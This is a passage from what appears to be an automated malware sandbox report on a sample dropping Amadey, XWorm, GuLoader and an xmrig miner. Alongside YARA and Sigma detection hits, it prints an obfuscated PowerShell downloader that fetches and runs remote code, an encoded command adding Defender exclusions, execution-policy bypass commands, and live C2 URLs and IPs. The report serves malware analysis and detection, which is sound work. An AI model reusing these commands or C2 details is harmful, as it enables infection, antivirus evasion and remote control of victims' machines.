        • powershell.exe (PID: 8144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uforfrdetheds181; function Yasmak($Unsatanical){$Puritanic=3;do{$Joumbos+=$Unsatanical[$Puritanic];$Puritanic+=4} until(!$Unsatanical[$Puritanic])$Joumbos}function Seksualhygiejnen($Unshowmanlike){ .($bluenoser) ($Unshowmanlike)}$Calamondin=Yasmak 'T nn onEchaTGra.Ke W';$Calamondin+=Yasmak 'Jo EU sbSt,cCoulHarI.tue InnRebT';$Longwise=Yasmak 'ForMMi.oSorzGaviF rl,irlA faEnt/';$Stavkirkes=Yasmak ' AmTovel WasI n1Avn2';$Litterateur36='S.e[Plan .oeFreTFus.BusS IneT urSamv TaI Brc HueN npCe oMiniBilNOliTAtoMFimA AknLenAIvrGHese arUnc] Mo: a:halSAfkEElecF ruLilrMyxID rtMacY,egPPetrProo .aT,alo NoCAtooP rl B = re$ .aST xtMisA GavEmbKUdkiAccRfemkPreeForS';$Longwise+=Yasmak 'Low5 k .me 0Ov Snd(YasWUnhi,ocnUnbdNovoTrawM ds Sp OveNAnmTFra Ine1 ic0.nt. tr0Kli; ro AttWAkviI dn Un6 Ba4Lab;Fi, K txPre6Hel4No ;,cc BrrDisvOv : h1Pra3Muf4 H .Qu 0Sup) Un F rG .neKyscG.sk,amoGrn/Liv2Fra0Ank1Res0Non0 Pa1Can0 an1Mio ConFA.yigu.rLg e .yf FioHypxMa,/Kvl1Br 3Lns4Tra. on0';$Daarlighed=Yasmak 'midU UnSRepeT arVes-StrAFakG UneProN M T';$Radioactive=Yasmak ' Mah ertExotSkipA,ts nd:,at/pol/ComfNoni ilEt eSamdUnan.ro.floe H uLis/IntlordmAffjBonM ny1ManI .nt Tai,beFBruCE,uHIrrjkoeYFisATer4ApaJDahNOphRWeeBSvvYForB a3Ly 4B,f/ OvODepuHomt ResForoH ba .ar if. artPelo R c';$Stbeformens=Yasmak 'San>';$bluenoser=Yasmak 'SkriProeTilx';$Courtmartial='Hale';$Bacillebrerens='\Autonephrectomy.Noc';Seksualhygiejnen (Yasmak 'Pre$ForGHjeLUndoSchb MoaHallStr:SheUNadnDesCFrdUInhsS.ohAlfiF noLanNGarE orDPr =Ord$ SaEHypNPr.vBe,: UdA rsP N PPaud ekAViqt FuaMal+Bre$LamBPorA apCOutI ,ol arLS.rE rybOver.nmE ToRForET ln.eas');Seksualhygiejnen (Yasmak 'Sla$ Cog HalSjaO,kiBMura ppLRec:IllMA hYBorS CetThrIpolk te,ipr U.efannHal1Enr4Ant1 el= nn$ esr AkALigdG viComOUbna giCSanTerii,akVFore ,a.KursMagp,ncL uiIT oT in(Kmp$RouSAfsTDe BObsETenf ceoDacr PamFliE R nPl sLas)');Seksualhygiejnen (Yasmak $Litterateur36);$Radioactive=$Mystikeren141[0];$Recognise=(Yasmak 'Kip$LgfgBooLPreo DabXenaFinlPre:na eCheNTrnAstymHaleunmL JaI H,nBliGU.hSEla=SpanfulEDecW os- .io xcBO vjIndECouc ,vt P MoS.oaYPres ibt Flesc mr.l.Rad$EkscFugA ptl ,rALi,MEksoStunSupdUpcIKjon');Seksualhygiejnen ($Recognise);Seksualhygiejnen (Yasmak ' Uf$ B E denWuzaCymmPreeMi,l leiBernStagSubsO e. dHBlye Ala .odSp eBi,rUncsKe,[Abi$WalDOr.awyvaKilrBryl,ntiT,lglarhBese,epdEd ]Myr=Sys$.paLKonoRetnNongG nwStuia.tsEjee');$Upcutting173=Yasmak 'S g$Ju,EPr.nChuaFalma,re BrlReriS lnSkagChus Kr.DiaDMoyo tewTr nB tlGlao PoaAk dThyFBe.ihyll uneGem(Phi$SipR InaSupdSariUncoOveaIt cTaatFo iRunvHj e H ,Ta $ irV ,ii OtdRepe anbFloe .og yprH,oetoftBlosLa,1 Ud7 l 9d k)';$Videbegrets179=$Uncushioned;Seksualhygiejnen (Yasmak 'P r$ iGSquLSelopl bBeha arLSka:ScrsCoitTafRC aufrdkPertBakU ivRAr.eUs.RSape ,us Pr=Pa (ColtSplE BrS BaTB l-Ab.pblaA eT lahDec Ser$ .aVlocI edVe EPh BLigECligtror aeO,etFleSFra1De,7S e9Dev)');while (!$Struktureres) {Seksualhygiejnen (Yasmak 'St $VatgFral asoA.sb keaUnnl G : ChD Amu fnkFylsPoleBastbesys.rpg neUn,=Una$ HeEBesnAffd BeoDe,cKonr U iSw nSeko PepBeraDektDi,h') ;Seksualhygiejnen $Upcutting173;Seksualhygiejnen (Yasmak ' ChSEdeTT.tA StRPretByg- Sns.amlIlleSagEEphpAn Gor4');Seksualhygiejnen (Yasmak 'Cy,$Im GLacL.leoNo.BnonADeplJor: W,Sde t GnR ovU O kAbrTSkouCasrSp eMasr orePanS.es= Si( BeTOp.ErdsSAr T d- O pS aaV ctPaahC n Grs$.olv Fli udDUd ESamBVi ELegG TrRUdrEN nTFiss .a1Dis7 Un9Fun)') ;Seksualhygiejnen (Yasmak ' ub$S igC mLTrfOUbaBQuaAR dl Af: P TVi O or T ncypIS lR NoiLi ScraKFerECivrS l=Fj $Z rGParL DeO HyBSavAIfrl ,t:VidFAutOPrarkroE eadalmE Br6 Fa2Ce +b.i+Und%Sem$Ev m paYIrgS Svt,egIMarkKlaETerRJeneCucn.ut1 Sh4Bol1 Ls.corcRomoLimULrrnIntT') ;$Radioactive=$Mystikeren141[$Tornirisker]}$Fiend=82563;$Honk=30245;Seksualhygiejnen (Yasmak ' Se$O,cGfluL SkOf sBM,na SuL s: SatHikR nI omCIn.rReseT,lSFetoDyrL Fa Fed=Ant C,igHjreFo.t Li-LoucUn,OStrNMedt GhEFren ,ptSal ol$AftV StI ydLutETilBeleE PrG lvRF oe N TOptS Am1 Km7S l9');Seksualhygiejnen (Yasmak 'Gim$maig nlGymoImmbStra ZelBar:SteUSorrFlae ObtDephLetrGasoFelsUnfeWinxLituAlcaMo lUne Su.=Non lo[GanS DiyB os trtLo.e,almcau.TesCNono oonShavE eeEjerLe tFun]Sik:Gr.:OveFRa.rBiroUntm taBSkra L s,raes a6Bre4VskS Iot ,orGagi RenPlagB t(Agg$ ReTKlorF.tiUticBanrTrie,ibsG.moAngl Ac)');Seksualhygiejnen (Yasmak ' e$LigG FoL.erO idBTviA rglPl : pNK moForNGeoSPrek StisildSc DPolIRein.ueG Ki Pro=Drs hon[Bles.ovYSpisNedtO eETr mafs.Fjet M eSouX L,TBla. emeschnbusCKomo ncdF aitosnV ng og]Alc:A.i:GenaexeS pocForI B iSkr.C agFluebilt NosBarTMonrGraI.lan D gExp(Ord$UdruSurr OreO ttUnehUnsr Fio AcSUd EAhwxAntuPr.aTraLlaw)');Seksualhygiejnen (Yasmak 'm n$HypGPrsLStaO GabMe.At iLAar:Freb S ANong eKComLOveOJo GTilTarc=I.d$ DonDobo WaNBadsSanKUn I,vedSamD.agiDisNkubgBry. K.S Dau laB SuS etUn,RIsoiKulnUnmGSeq(Shl$MisFLitIBeleOutNGlaDIne,Pr $.rchpluoSy.nPycKMo )');Seksualhygiejnen $Bagklogt;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • GameBarPresenceWriter.exe (PID: 4900 cmdline: "C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer MD5: 844ACA5CF399BB64E3577360A423E7D8)
  • OpenWith.exe (PID: 6284 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • vapo.exe (PID: 7320 cmdline: C:\Users\user\AppData\Roaming\vapo.exe MD5: EE14A993B4F9BF8B3F0421F0A44C2057)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/7G6zzQwJ"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Threatname: Amadey

{"C2 url": ["http://www.jrsoftware.org/ishelp/index.php"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x1b1faf9:$x1: AsyncRAT
  • 0x1b1fb37:$x1: AsyncRAT
  • 0x1b20b9c:$x1: AsyncRAT
  • 0x1b20bda:$x1: AsyncRAT
  • 0x1171ad3:$s6: VirtualBox
  • 0x376684:$s8: Win32_ComputerSystem
  • 0x1171a31:$s8: Win32_ComputerSystem
  • 0x301be6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x30e5ca:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1177b19:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1177bb6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x301e2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x30e7c2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1177ccb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x301a22:$cnc4: POST / HTTP/1.1
  • 0x30e406:$cnc4: POST / HTTP/1.1
  • 0x1174400:$cnc4: POST / HTTP/1.1
sslproxydump.pcapJoeSecurity_GhostRatYara detected GhostRatJoe Security
    sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      sslproxydump.pcapWindows_Trojan_Metasploit_a6e956c9Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x222e56:$a1: 60 89 E5 31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 7C 02 2C 20
      sslproxydump.pcapWindows_Trojan_Metasploit_4a1c4da8Identifies Metasploit 64 bit reverse tcp shellcode.unknown
      • 0x222f19:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
      • 0x390382:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
      Click to see the 5 entries

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\Downloads\haus\amada2.exeMALWARE_Win_AmadeyAmadey downloader payloadditekSHen
      • 0xb228:$s1: _ZZ14aGetProgramDirvE11UsersDirRes
      • 0xbc9e:$s2: _libshell32_a
      • 0xc3e9:$s2: _libshell32_a
      • 0xb956:$s3: _ShellExecuteExA@4
      • 0xb9fd:$s3: _ShellExecuteExA@4
      • 0xb1fc:$s4: aGetTempDirvE10TempDirRes
      • 0xb60d:$s5: aGetHostNamevE7InfoBuf
      • 0xb541:$s6: aCreateProcessPc
      • 0xb60d:$s7: aGetHostNamev
      • 0xb629:$s7: aGetHostNamev
      • 0xb2ba:$s8: aGetSelfDestinationiE22aGetSelfDestinationRes
      • 0xb1c4:$s9: aGetSelfPathvE15aGetSelfPathRes
      • 0xb4a9:$s10: aResolveHostPcE15aResolveHostRes
      • 0xb518:$s11: aUrlMonDownloadPcS
      • 0xb4e3:$s12: aWinSockPostPcS_S_
      • 0xb500:$s12: aWinSockPostPcS_S_
      • 0xb541:$s13: aCreateProcessPc
      C:\ProgramData\1be588a5b7\gdsun.exeMALWARE_Win_AmadeyAmadey downloader payloadditekSHen
      • 0xb228:$s1: _ZZ14aGetProgramDirvE11UsersDirRes
      • 0xbc9e:$s2: _libshell32_a
      • 0xc3e9:$s2: _libshell32_a
      • 0xb956:$s3: _ShellExecuteExA@4
      • 0xb9fd:$s3: _ShellExecuteExA@4
      • 0xb1fc:$s4: aGetTempDirvE10TempDirRes
      • 0xb60d:$s5: aGetHostNamevE7InfoBuf
      • 0xb541:$s6: aCreateProcessPc
      • 0xb60d:$s7: aGetHostNamev
      • 0xb629:$s7: aGetHostNamev
      • 0xb2ba:$s8: aGetSelfDestinationiE22aGetSelfDestinationRes
      • 0xb1c4:$s9: aGetSelfPathvE15aGetSelfPathRes
      • 0xb4a9:$s10: aResolveHostPcE15aResolveHostRes
      • 0xb518:$s11: aUrlMonDownloadPcS
      • 0xb4e3:$s12: aWinSockPostPcS_S_
      • 0xb500:$s12: aWinSockPostPcS_S_
      • 0xb541:$s13: aCreateProcessPc
      C:\Users\user\AppData\Roaming\vapo.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\vapo.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
        • 0x594f:$str01: $VB$Local_Port
        • 0x5940:$str02: $VB$Local_Host
        • 0x5b1a:$str03: get_Jpeg
        • 0x56d0:$str04: get_ServicePack
        • 0x6607:$str05: Select * from AntivirusProduct
        • 0x6729:$str06: PCRestart
        • 0x673d:$str07: shutdown.exe /f /r /t 0
        • 0x67dd:$str08: StopReport
        • 0x67b3:$str09: StopDDos
        • 0x6823:$str10: sendPlugin
        • 0x6865:$str11: OfflineKeylogger Not Enabled
        • 0x69eb:$str12: -ExecutionPolicy Bypass -File "
        • 0x6b1c:$str13: Content-length: 5235
        C:\Users\user\AppData\Roaming\vapo.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x6bfb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x6c98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x6dad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x6a37:$cnc4: POST / HTTP/1.1
        Click to see the 6 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x2280e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x2b658:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x228ab:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x2b700:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x229c0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x2b820:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x22564:$cnc4: POST / HTTP/1.1
            0000001A.00000002.2378224963.0000000002D03000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              00000013.00000002.4639398920.00000000023BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 39 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                9.3.wow.exe.1d428d2b790.97.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  9.3.wow.exe.1d428d2b790.97.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    9.3.wow.exe.1d428d2b790.97.raw.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                    • 0x594f:$str01: $VB$Local_Port
                    • 0x5940:$str02: $VB$Local_Host
                    • 0x5b1a:$str03: get_Jpeg
                    • 0x56d0:$str04: get_ServicePack
                    • 0x6607:$str05: Select * from AntivirusProduct
                    • 0x6729:$str06: PCRestart
                    • 0x673d:$str07: shutdown.exe /f /r /t 0
                    • 0x67dd:$str08: StopReport
                    • 0x67b3:$str09: StopDDos
                    • 0x6823:$str10: sendPlugin
                    • 0x6865:$str11: OfflineKeylogger Not Enabled
                    • 0x69eb:$str12: -ExecutionPolicy Bypass -File "
                    • 0x6b1c:$str13: Content-length: 5235
                    9.3.wow.exe.1d428d2b790.97.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x6bfb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x6c98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x6dad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x6a37:$cnc4: POST / HTTP/1.1
                    28.2.Enalib.exe.7890000.3.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      Click to see the 21 entries

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_8144.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi64_988.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                          amsi64_8004.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\wow.exe, ProcessId: 6092, TargetFilename: C:\Users\user\Downloads\haus\conhost.exe
                            Sigma detected: Potentially Suspicious Malware Callback Communication
                            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 124.71.164.7, DestinationIsIpv6: false, DestinationPort: 4433, EventID: 3, Image: C:\Users\user\Desktop\wow.exe, Initiated: true, ProcessId: 6092, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49819
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Downloads\haus\conhost.exe" , ParentImage: C:\Users\user\Downloads\haus\conhost.exe, ParentProcessId: 7500, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 7860, ProcessName: cmd.exe
                            Sigma detected: Suspect Svchost Activity
                            Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Downloads\haus\sel1.exe" , ParentImage: C:\Users\user\Downloads\haus\sel1.exe, ParentProcessId: 7188, ParentProcessName: sel1.exe, ProcessCommandLine: svchost.exe, ProcessId: 7240, ProcessName: svchost.exe
                            Sigma detected: Suspicious PowerShell Parameter Substring
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force, CommandLine: "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\haus\T.exe" , ParentImage: C:\Users\user\Downloads\haus\T.exe, ParentProcessId: 7448, ParentProcessName: T.exe, ProcessCommandLine: "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force, ProcessId: 5176, ProcessName: powershell.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\Downloads\haus\conhost.exe" , CommandLine: "C:\Users\user\Downloads\haus\conhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\Downloads\haus\conhost.exe, NewProcessName: C:\Users\user\Downloads\haus\conhost.exe, OriginalFileName: C:\Users\user\Downloads\haus\conhost.exe, ParentCommandLine: "C:\Users\user\Desktop\wow.exe", ParentImage: C:\Users\user\Desktop\wow.exe, ParentProcessId: 6092, ParentProcessName: wow.exe, ProcessCommandLine: "C:\Users\user\Downloads\haus\conhost.exe" , ProcessId: 7500, ProcessName: conhost.exe
                            Sigma detected: WScript or CScript Dropper
                            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\wow.exe", ParentImage: C:\Users\user\Desktop\wow.exe, ParentProcessId: 6092, ParentProcessName: wow.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" , ProcessId: 7740, ProcessName: wscript.exe
                            Sigma detected: Change PowerShell Policies to an Insecure Level
                            Source: Process startedAuthor: frack113: Data: Command: "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force, CommandLine: "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\haus\T.exe" , ParentImage: C:\Users\user\Downloads\haus\T.exe, ParentProcessId: 7448, ParentProcessName: T.exe, ProcessCommandLine: "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force, ProcessId: 5176, ProcessName: powershell.exe
                            Sigma detected: Communication To Uncommon Destination Ports
                            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 159.65.122.137, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\wow.exe, Initiated: true, ProcessId: 6092, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49774
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\E743A7.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 7240, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\RegisteredApplications
                            Sigma detected: Direct Autorun Keys Modification
